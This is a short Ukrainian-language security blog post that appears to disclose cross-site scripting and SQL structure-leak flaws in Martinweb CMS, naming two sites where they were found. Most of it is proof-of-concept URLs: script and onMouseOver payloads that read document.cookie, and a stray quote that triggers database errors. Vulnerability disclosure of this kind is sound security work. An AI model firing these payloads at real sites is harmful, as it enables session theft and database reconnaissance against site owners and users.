Websecurity - Веб безпека

11.10.2010

У червні, 22.06.2010, я знайшов Cross-Site Scripting та SQL DB Structure Extraction уразливості в Martinweb CMS (це українська комерційна CMS). Які я виявив на сайті www.kontrakt.ua, а також деякі з даних уразливостей є на сайті www.bakotech.com.ua. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.12.2010

XSS:

http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html
http://site/index.php?pages='&language=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (з MouseOverJacking):

http://site/index.php?op=search&search='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'
http://site/index.php?op=search&pages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'

SQL DB Structure Extraction:

http://site/index.php?pages=’

Уразливі потенційно всі версії Martinweb CMS.

This entry was posted on 15:18 22.12.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.